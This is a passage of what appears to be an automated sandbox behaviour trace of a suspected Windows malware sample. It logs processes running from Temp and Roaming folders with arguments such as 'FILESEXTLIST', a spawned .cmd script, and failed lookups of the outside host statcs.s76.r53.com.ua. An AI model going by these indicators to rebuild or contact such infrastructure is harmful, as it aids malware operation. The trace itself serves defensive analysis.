lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xe2c, dwThreadId=0xe30)) returned 1 [0115.817] CloseHandle (hObject=0xec) returned 1 [0115.817] CloseHandle (hObject=0xe8) returned 1 [0115.817] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] GetCurrentThreadId () returned 0xdec [0115.817] WSACleanup () returned 0 [0116.191] FreeLibrary (hLibModule=0x77380000) returned 1 [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentProcess () returned 0xffffffff [0116.192] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0116.192] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] ResetEvent (hEvent=0x88) returned 1 [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] ResetEvent (hEvent=0x88) returned 1 [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] CloseHandle (hObject=0x88) returned 1 [0116.192] CloseHandle (hObject=0x8c) returned 1 [0116.192] CloseHandle (hObject=0x84) returned 1 [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.192] GetCurrentThreadId () returned 0xdec [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] VirtualFree (lpAddress=0x13f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0116.196] FreeLibrary (hLibModule=0x76910000) returned 1 [0116.196] LocalFree (hMem=0x704448) returned 0x0 [0116.196] FreeLibrary (hLibModule=0x76910000) returned 1 [0116.196] LocalFree (hMem=0x704438) returned 0x0 [0116.196] ExitProcess (uExitCode=0x0) Thread: id = 83 os_tid = 0xe18 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x14e8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0115.647] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1521ffc, cbMultiByte=27, lpWideCharStr=0x162ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x14da714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x14e867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0115.647] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x162fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x162fbac | out: ppResult=0x162fbac*=0x0) returned 11001 [0115.688] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x162fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x162fbac | out: ppResult=0x162fbac*=0x0) returned 11001 [0115.716] getnameinfo (in: pSockaddr=0x162fc14, SockaddrLength=0x0, pNodeBuffer=0x143831c, NodeBufferSize=0x401, pServiceBuffer=0x1505124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0115.716] htons (hostshort=0x0) returned 0x0 [0115.717] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0115.717] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] SetEvent (hEvent=0x84) returned 1 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] CloseHandle (hObject=0xb8) returned 1 [0115.717] RtlExitUserThread (Status=0x0) Thread: id = 85 os_tid = 0xe24 Process: id = "50" image_name = "gym4nxcu.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe" page_root = "0x7ea167e0" os_pid = "0xdf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0xdb0" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7789 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7790 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7791 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7792 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7793 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7794 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7795 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7796 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7797 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7877 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7878 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7879 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 7880 start_va = 